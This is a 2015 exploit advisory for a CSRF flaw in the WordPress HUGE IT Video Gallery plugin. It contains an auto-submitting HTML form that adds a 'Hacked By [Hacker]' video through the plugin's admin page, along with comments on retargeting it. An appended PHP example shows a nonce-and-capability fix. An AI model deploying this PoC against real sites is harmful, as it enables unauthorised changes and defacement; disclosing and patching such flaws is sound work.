<!--
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title : WordPress HUGE IT Video Gallery CSRF Vulnerability
[+]
[+] Version : 1.3.6
[+]
[+] Exploit Author : The Nonexistent
[+]
[+] Vendor Homepage: https://wordpress.org/plugins/gallery-video/
[+]
[+] Software Link: https://downloads.wordpress.org/plugin/gallery-video.1.3.6.zip
[+]
[+] Date: 8 Sep 2015
[+]
[+] Tested On : Kali Linux, BackTrack, Windows 8.1
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] #You Can Modify The Form Values And The Address (Which Has The Gallery's Id),
[+] You Can Also Change The Video Id In Target URL.
[+]
[+] #You Can Add A New Video To Video Gallery With This Vulnerability
[+]
[+] #Change The [YOUTUBE LINK HERE] To Whatever You Want.
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Exploit Code:
-->
<body onload="document.exploit.submit();">
<form method="post" action="host/wp-admin/admin.php?page=videogallerys_huge_it_videogallery&task=videogallery_video&id=2&closepop=1" name="exploit">
<input type="text" id="huge_it_add_video_input" name="huge_it_add_video_input" value="[YOUTUBE LINK HERE]"/>
<button class='save-slider-options button-primary huge-it-insert-video-button' id='huge-it-insert-video-button'>Insert Video</button>
<div id="add-video-popup-options">
<div>
<div>
<label for="show_title">Title:</label>
<div>
<input name="show_title" type="text" value="Hacked By [Hacker]"/>
</div>
</div>
<div>
<label for="show_description">Description:</label>
<textarea id="show_description" name="show_description"></textarea>
</div>
<div>
<label for="show_url">Url:</label>
<input type="text" name="show_url" value="Hacked By [Hacker]" />
</div>
</div>
</div>
</form>
</body>
<!--
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Vulnerable Pages :
[+]
[+] host/wp-admin/admin.php?page=videogallerys_huge_it_videogallery
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Discovered by : The Nonexistent
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
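[+] Added example (not part of the original advisory and not the plugin's own code):
[+] the form above carries no anti-CSRF token, so the usual WordPress fix is a nonce
[+] plus a capability check before the video is saved. The example_* function names,
[+] the nonce field name and the manage_options capability are assumptions; the request
[+] parameter names are the ones used in the PoC form.

```php
<?php
// Added example with hypothetical names (example_*); not the plugin's own code.

// Nonce action bound to the gallery id, so a token issued for one gallery
// is rejected for another.
function example_add_video_action( $gallery_id ) {
    return 'example_add_video_' . absint( $gallery_id );
}

// Call inside the "add video" form when rendering the admin popup.
function example_render_add_video_nonce( $gallery_id ) {
    wp_nonce_field( example_add_video_action( $gallery_id ), 'example_add_video_nonce' );
}

// Read one POST field as a string; arrays and missing keys become ''.
function example_post_string( $key ) {
    return ( isset( $_POST[ $key ] ) && is_string( $_POST[ $key ] ) ) ? wp_unslash( $_POST[ $key ] ) : '';
}

// Call at the top of the task=videogallery_video handler, before any write.
// Returns sanitized values, or terminates the request via wp_die().
function example_validated_add_video_request() {
    $gallery_id = isset( $_GET['id'] ) ? absint( $_GET['id'] ) : 0;

    // Assumed capability; use whatever the plugin's menu page requires.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You are not allowed to edit this gallery.', '', array( 'response' => 403 ) );
    }

    // Dies unless the POST carries a valid nonce for this user, session and gallery.
    // A cross-site auto-submitting form cannot read the admin page, so it cannot supply one.
    check_admin_referer( example_add_video_action( $gallery_id ), 'example_add_video_nonce' );

    $video_url = esc_url_raw( example_post_string( 'huge_it_add_video_input' ) );
    if ( '' === $video_url ) {
        wp_die( 'A valid video URL is required.', '', array( 'response' => 400 ) );
    }

    return array(
        'gallery_id'  => $gallery_id,
        'video_url'   => $video_url,
        'title'       => sanitize_text_field( example_post_string( 'show_title' ) ),
        'description' => sanitize_textarea_field( example_post_string( 'show_description' ) ),
        'link'        => esc_url_raw( example_post_string( 'show_url' ) ),
    );
}
```

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]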
-->